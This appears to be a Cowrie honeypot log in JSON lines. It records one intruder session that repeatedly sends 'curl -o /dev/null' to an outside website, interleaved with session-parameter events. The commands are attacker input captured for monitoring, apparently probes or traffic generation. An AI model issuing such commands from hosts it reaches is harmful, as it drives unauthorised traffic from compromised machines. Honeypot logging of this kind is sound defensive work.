{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.399781Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.436208Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.437380Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.479912Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.481107Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.597759Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.598904Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.641816Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.643106Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.687763Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.688853Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.729957Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.731081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.768764Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.770040Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.821842Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.822972Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.915169Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.916195Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.956919Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.958009Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:42.997795Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:42.999028Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.037527Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.038820Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.077192Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.078407Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.117469Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.118808Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.162220Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.163416Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.200767Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.201888Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.239441Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.240740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.278293Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.279605Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.317424Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.318746Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.360834Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.362080Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.399510Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.400495Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.440018Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.441132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.479458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.480491Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.517383Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.518622Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.556294Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.557374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.663980Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.665135Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.701619Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.702569Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.747213Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.748314Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.803401Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.804575Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.860767Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.861905Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.915713Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.916856Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.956648Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:43.957769Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:43.999687Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.000784Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.045448Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.046690Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.085672Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.086893Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.123683Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.124825Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.161953Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.162948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.202162Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.203243Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.239713Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.240777Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.281136Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.282212Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.323947Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.325015Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.374578Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.375655Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.412417Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.413453Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.453568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.454715Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.575581Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.576638Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.614768Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.615831Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.660169Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.661233Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.802132Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.803227Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.842894Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.843913Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.886438Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.887464Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.926306Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.927628Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:44.966586Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:44.967565Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.019320Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.020342Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.059712Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.060965Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.149260Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.150316Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.187397Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.188466Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.225111Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.226311Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.338701Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.339818Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.377068Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.378051Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.420447Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.422068Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.461698Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.462891Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.501429Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.502421Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.571071Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.572363Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.643071Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.644043Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
